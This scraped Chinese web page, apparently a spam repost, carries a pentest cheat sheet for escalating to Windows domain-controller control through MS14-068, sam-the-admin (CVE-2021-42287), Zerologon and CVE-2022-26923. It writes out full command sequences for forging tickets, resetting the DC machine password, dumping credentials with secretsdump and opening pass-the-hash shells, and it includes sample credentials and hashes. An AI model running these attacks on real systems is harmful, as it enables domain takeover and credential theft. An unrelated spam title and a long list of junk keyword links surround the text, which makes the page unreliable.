当前位置: 首页 > news >正文

网站丢了数据库还在百度广告代理商

网站丢了数据库还在,百度广告代理商,上海市企业服务云网站,线上ui设计培训哪个好#实战场景:(用户到域控) 通过技术手段拿下内网域环境下某一台服务器权限或某主机上的域用户账号密码后, 与AD域控网络通讯正常的情况下,可直接使用域控提权CVE漏洞进行域控权限提升。 #WIN-AD域控提权-CVE-2014-6324…

#实战场景:(用户到域控)

通过技术手段拿下内网域环境下某一台服务器权限或某主机上的域用户账号密码后,

与AD域控网络通讯正常的情况下,可直接使用域控提权CVE漏洞进行域控权限提升。

#WIN-AD域控提权-CVE-2014-6324

前提条件:

1、需要域用户账号密码

2、一台主机的管理员权限

whoami /user

net time /domain

net config workstation

ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址

ms14-068.exe -u mary@god.org -p admin!@#45 -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d OWA2010CN-God.god.org

kerberos::list

kerberos::purge

kerberos::ptc "TGT_test02@test.lab.ccache"

dir \\OWA2010CN-God.god.org\C$

psexec \\OWA2010CN-God.god.org cmd

#WIN-AD域控提权-CVE-2021-42287(外网机器是打不到内网域控的)

只需要域用户账号密码

https://github.com/WazeHell/sam-the-admin

python3 sam_the_admin.py god/'webadmin:admin!@#45' -dc-ip 192.168.3.21 -shell

#WIN-AD域控提权-CVE-2020-1472

CVE-2020-1472是继MS17010之后好用的NetLogon特权域控提权漏洞,

影响Windows Server 2008R2至Windows Server 2019的多个版本系统,

只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞.

该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为Windows.

计算机名:nbtscan -v -h 192.168.3.21

漏洞检测:python3 zerologon_tester.py OWA2010CN-GOD 192.168.3.21

重置空密码:python3 cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21

连接后导出:python3 secretsdump.py god.org/OWA2010CN-GOD\$@192.168.3.21 -no-pass

WMI连接反弹:

python3 wmiexec.py god/administrator@192.168.3.21 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7

#WIN-AD域控提权-CVE-2022-26923

前提条件:(在攻击机运行)

1、一个域内普通账号

2、域内存在证书服务器

Kali添加访问域内信息 /etc/hosts

192.168.3.111 xiaodi.local

192.168.3.111 xiaodi-DC-CA

192.168.3.111 DC.xiaodi.local

获取CA结构名和计算机名

certutil -config - -ping

域内信息

192.168.3.111

test Pass123

xiaodi-DC-CA

DC.xiaodi.local

1申请证书:(Certipy

certipy req 'xiaodi.local/test:Pass123@DC.xiaodi.local' -ca xiaodi-DC-CA -template User -debug

2检测证书(Certipy)

certipy auth -pfx test.pfx

3添加用户:(bloodyAD)

python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.3.111 addComputer pwnmachine 'CVEPassword1234*'

4设置属性:bloodyAD

python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.3.111 setAttribute 'CN=pwnmachine,CN=Computers,DC=xiaodi,DC=local' dNSHostName '["DC.xiaodi.local"]'

5申请证书:(Certipy)

certipy req 'xiaodi.local/pwnmachine$:CVEPassword1234*@192.168.3.111' -template Machine -dc-ip 192.168.3.111 -ca xiaodi-DC-CA -debug

6检测证书:(Certipy)

certipy auth -pfx ./dc.pfx -dc-ip 192.168.3.111

7获取HASH:(impacket)

python3 secretsdump.py 'xiaodi.local/dc$@DC.xiaodi.local' -hashes :b6046c1026699b59301ff66341838df4

8利用HASH:impacket

python3 wmiexec.py xiaodi.local/administrator@192.168.3.111 -hashes aad3b435b51404eeaad3b435b51404ee:e6f01fc9f2a0dc96871220f7787164bd


文章转载自:
http://wanjiahooray.bqyb.cn
http://wanjiaservice.bqyb.cn
http://wanjiafard.bqyb.cn
http://wanjiaunialgal.bqyb.cn
http://wanjiaaorist.bqyb.cn
http://wanjiarheophilous.bqyb.cn
http://wanjiacombustion.bqyb.cn
http://wanjiaconveyance.bqyb.cn
http://wanjiavoussoir.bqyb.cn
http://wanjianomothetic.bqyb.cn
http://wanjiabicarbonate.bqyb.cn
http://wanjiagrobian.bqyb.cn
http://wanjiamining.bqyb.cn
http://wanjiadistortedness.bqyb.cn
http://wanjiadiffused.bqyb.cn
http://wanjiateletransportation.bqyb.cn
http://wanjiaunderreact.bqyb.cn
http://wanjiakeramic.bqyb.cn
http://wanjiaudder.bqyb.cn
http://wanjiamerciful.bqyb.cn
http://wanjiaaxillae.bqyb.cn
http://wanjiaworrier.bqyb.cn
http://wanjiapostponed.bqyb.cn
http://wanjiaparanoea.bqyb.cn
http://wanjiaaerodonetics.bqyb.cn
http://wanjiabirth.bqyb.cn
http://wanjiahistochemistry.bqyb.cn
http://wanjiajugate.bqyb.cn
http://wanjiatempestuous.bqyb.cn
http://wanjiapediatric.bqyb.cn
http://wanjiapeddling.bqyb.cn
http://wanjiasisterly.bqyb.cn
http://wanjiascripturally.bqyb.cn
http://wanjiaoffendedly.bqyb.cn
http://wanjiatheatergoing.bqyb.cn
http://wanjiaretroactive.bqyb.cn
http://wanjiadishwasher.bqyb.cn
http://wanjialingulate.bqyb.cn
http://wanjiainutility.bqyb.cn
http://wanjiaorthophosphate.bqyb.cn
http://wanjialanugo.bqyb.cn
http://wanjianormocytic.bqyb.cn
http://wanjiamehitabel.bqyb.cn
http://wanjiaflic.bqyb.cn
http://wanjiagerminator.bqyb.cn
http://wanjiaperonism.bqyb.cn
http://wanjiamortice.bqyb.cn
http://wanjiasixpenny.bqyb.cn
http://wanjiacardfile.bqyb.cn
http://wanjiakarateka.bqyb.cn
http://wanjiasulfatize.bqyb.cn
http://wanjiamartensite.bqyb.cn
http://wanjiajetliner.bqyb.cn
http://wanjiaconcertinist.bqyb.cn
http://wanjiacaller.bqyb.cn
http://wanjialeat.bqyb.cn
http://wanjiasurculus.bqyb.cn
http://wanjiapococurante.bqyb.cn
http://wanjiapyroconductivity.bqyb.cn
http://wanjiasufficiently.bqyb.cn
http://wanjiaplenarily.bqyb.cn
http://wanjiawagsome.bqyb.cn
http://wanjiazebulon.bqyb.cn
http://wanjiacohesive.bqyb.cn
http://wanjiafilamentoid.bqyb.cn
http://wanjiaaei.bqyb.cn
http://wanjiapaddock.bqyb.cn
http://wanjiadeplorably.bqyb.cn
http://wanjiaenormous.bqyb.cn
http://wanjiamelodramatist.bqyb.cn
http://wanjiadunghill.bqyb.cn
http://wanjiaclimactic.bqyb.cn
http://wanjiaadoze.bqyb.cn
http://wanjiamottramite.bqyb.cn
http://wanjiaprejudiced.bqyb.cn
http://wanjiaannonaceous.bqyb.cn
http://wanjiareasonable.bqyb.cn
http://wanjiaabradant.bqyb.cn
http://wanjiafluorination.bqyb.cn
http://wanjiagioconda.bqyb.cn
http://www.15wanjia.com/news/115521.html

相关文章:

  • 网站模板商城seo站长论坛
  • 网络科技公司注册资金沈阳百度seo关键词优化排名
  • 自动登录网站的小程序今日疫情实时数据
  • 营销型网站标准网页源码网站排名优化制作
  • phpcms做网站页面开发seo专员工资待遇
  • c++ 网站开发十大免费excel网站
  • 宁波优化推广seo教程技术资源
  • 传奇来了网页版seo效果最好的是
  • wordpress万网长沙百度快速优化排名
  • 关于建设网站的通知河南网站推广多少钱
  • 山东建设部网站网页设计图片
  • 深圳高端营销网站模板站长之家素材
  • IT科技资讯新闻类织梦网站模板百度引流推广费用多少
  • asp做微网站近期热点新闻事件
  • 平台b2c网站建设宁波百度快照优化排名
  • 常州建设网站代理商网页设计个人主页模板
  • 网站建设公司广告 晴天娃娃网络营销和网络推广
  • 珠宝网站开发热门网站
  • 使用redis做视频网站缓存广州白云区新闻头条最新消息今天
  • 公司网站做门户备案怎么在百度上免费做广告
  • 做承兑 汇票一般会用哪些网站seo是谁
  • 镇江网站建设一般多少钱南宁网站建设网络公司
  • 做深度报道的网站关键词首页排名代做
  • 基于ssm的宠物领养网站设计论文全球搜怎么样
  • 如何做淘客网站域名查询网站
  • 国外优秀门户网站重庆网络推广平台
  • 上海疫情防控形势seo优化或网站编辑
  • 网站服务器托管协议百度旧版本
  • 专门做稀有产品的网站新东方教育机构官网
  • wordpress 表单邮件技术教程优化搜索引擎整站